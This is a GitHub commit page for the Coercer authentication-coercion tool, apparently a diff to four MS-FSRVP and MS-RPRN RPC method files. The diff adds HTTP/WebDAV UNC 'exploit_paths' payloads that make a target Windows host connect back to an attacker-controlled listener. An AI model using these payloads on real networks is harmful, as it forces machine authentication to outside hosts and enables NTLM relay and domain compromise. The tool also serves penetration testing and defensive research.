Skip to content

Commit

Permalink
Fixed #83
Browse files Browse the repository at this point in the history
  • Loading branch information
p0dalirius committed Oct 14, 2024
1 parent d7624be commit a42040b
Show file tree
Hide file tree
Showing 4 changed files with 7 additions and 4 deletions.
3 changes: 2 additions & 1 deletion coercer/methods/MS_FSRVP/IsPathShadowCopied.py
Original file line number Diff line number Diff line change
Expand Up @@ -36,7 +36,8 @@ class IsPathShadowCopied(MSPROTOCOLRPCCALL):
"""

exploit_paths = [
("smb", '\\\\{{listener}}\x00')
("smb", '\\\\{{listener}}\x00'),
("http", '\\\\{{listener}}@{{http_listen_port}}/{{rnd(3)}}\x00')
]

access = {
Expand Down
3 changes: 2 additions & 1 deletion coercer/methods/MS_FSRVP/IsPathSupported.py
Original file line number Diff line number Diff line change
Expand Up @@ -36,7 +36,8 @@ class IsPathSupported(MSPROTOCOLRPCCALL):
"""

exploit_paths = [
("smb", '\\\\{{listener}}\x00')
("smb", '\\\\{{listener}}\x00'),
("http", '\\\\{{listener}}@{{http_listen_port}}/{{rnd(3)}}\x00')
]

access = {
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -19,7 +19,8 @@ class RpcRemoteFindFirstPrinterChangeNotification(MSPROTOCOLRPCCALL):
"""

exploit_paths = [
("smb", '\\\\{{listener}}\x00')
("smb", '\\\\{{listener}}\x00'),
("http", '\\\\{{listener}}@{{http_listen_port}}/{{rnd(3)}}\x00')
]

access = {
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -20,7 +20,7 @@ class RpcRemoteFindFirstPrinterChangeNotificationEx(MSPROTOCOLRPCCALL):

exploit_paths = [
("smb", '\\\\{{listener}}\x00'),
("http", '\\\\{{listener}}@80/print\x00')
("http", '\\\\{{listener}}@{{http_listen_port}}/{{rnd(3)}}\x00')
]

access = {
Expand Down

0 comments on commit a42040b

Please sign in to comment.